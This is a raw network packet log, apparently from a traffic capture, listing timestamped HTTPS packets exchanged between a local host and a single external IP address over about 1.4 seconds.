Nov 21, 2024 22:12:23.451414108 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.451436996 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.451468945 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.451491117 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.456506968 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.456552029 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.456597090 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.456604958 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.456640005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.456654072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.462094069 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.462135077 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.462173939 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.462213993 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.462232113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.462251902 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.581993103 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.582041025 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.582134008 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.582186937 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.582238913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.582238913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.587654114 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.587718010 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.587764978 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.587776899 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.587810040 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.587829113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.626894951 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.626945019 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.627011061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.627027988 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.627039909 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.627074957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.632150888 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.632200003 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.632246017 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.632256985 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.632297039 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.632297039 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.637586117 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.637634039 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.637654066 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.637665033 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.637692928 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.637702942 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.643013000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.643059969 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.643081903 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.643090963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.643117905 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.643132925 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.648701906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.648749113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.648789883 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.648813009 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.648838043 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.648864985 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.654011011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.654057980 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.654083014 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.654092073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.654114962 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.654133081 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.774118900 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.774168015 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.774209023 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.774234056 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.774265051 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.774285078 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.779169083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.779211044 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.779253006 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.779263020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.779289961 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.779309034 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.818730116 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.818803072 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.818871021 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.818901062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.818941116 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.818964958 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.823800087 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.823844910 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.824003935 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.824016094 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.824089050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.829332113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.829376936 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.829425097 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.829435110 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.829463005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.829484940 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.834976912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.835058928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.835067987 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.835088015 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.835139990 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.838946104 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.840702057 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.840742111 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.840783119 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.840826035 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.840838909 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.840867043 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.845923901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.845966101 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.846003056 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.846016884 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.846049070 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.846939087 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.966732025 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.966780901 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.966995955 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.967029095 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.967078924 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.971848011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.971892118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.971959114 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.971968889 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:23.972007036 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:23.972018003 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.010833025 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.010876894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.010998011 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.011022091 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.011050940 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.011070013 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.016271114 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.016314030 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.016369104 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.016380072 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.016411066 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.016432047 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.021287918 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.021336079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.021374941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.021384001 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.021414995 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.021426916 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.026863098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.026905060 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.026962042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.026976109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.027004004 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.027023077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.032490969 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.032536030 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.032691956 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.032701969 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.032747030 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.037905931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.037951946 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.037987947 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.037997007 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.038024902 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.038038015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.159559965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.159604073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.159648895 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.159672976 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.159704924 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.159719944 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.165278912 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.165327072 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.165358067 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.165369034 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.165406942 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.165426016 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.202688932 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.202732086 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.202778101 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.202795029 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.202826023 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.202838898 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.208379984 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.208426952 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.208451033 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.208462954 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.208494902 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.208513975 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.213300943 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.213349104 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.213370085 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.213378906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.213402987 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.213421106 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.218975067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.219016075 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.219048023 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.219057083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.219093084 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.219100952 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.224549055 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.224622965 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.224673033 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.224682093 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.224694967 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.224725962 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.229819059 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.229860067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.229902983 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.229917049 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.229929924 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.229954958 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.351706982 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.351764917 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.351787090 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.351811886 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.351831913 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.351855040 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.357372999 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.357418060 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.357450962 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.357460976 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.357476950 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.357495070 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.394682884 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.394746065 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.394769907 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.394799948 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.394813061 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.394840002 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.400383949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.400425911 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.400460958 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.400476933 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.400494099 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.400512934 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.405409098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.405452967 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.405509949 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.405519009 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.405550957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.405575037 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.411075115 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.411118031 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.411159039 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.411170959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.411187887 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.411216021 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.416680098 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.416763067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.416774988 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.416786909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.416824102 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.416834116 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.421926975 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.421971083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.422020912 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.422029972 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.422060966 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.422089100 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.543781042 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.543834925 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.543920040 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.543971062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.543991089 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.544015884 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.549323082 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.549380064 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.549407005 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.549420118 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.549446106 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.549468994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.587157011 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.587205887 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.587325096 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.587351084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.587372065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.587395906 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.592634916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.592677116 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.592725992 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.592736959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.592767954 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.592791080 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.597584963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.597629070 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.597687006 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.597703934 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.597732067 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.597750902 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.603410959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.603455067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.603545904 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.603564024 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.603599072 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.603620052 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.608899117 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.608942986 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.608998060 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.609009981 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.609050989 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.609070063 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.614294052 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.614339113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.614398003 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.614409924 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.614432096 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.614454031 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.735842943 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.735902071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.735982895 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.736020088 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.736040115 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.736062050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.741327047 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.741369963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.741419077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.741434097 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.741461039 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.741511106 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.778866053 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.778929949 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.779036045 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.779097080 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.779119968 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.779139042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.784414053 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.784463882 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.784518957 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.784531116 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.784576893 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.790014029 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.790059090 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.790102959 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.790118933 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.790149927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.790163994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.794949055 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.794997931 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.795042038 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.795049906 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.795084953 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.795103073 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.800668955 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.800712109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:24.800756931 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:24.800765991 CET	443	49824	188.165.52.14	192.168.2.5
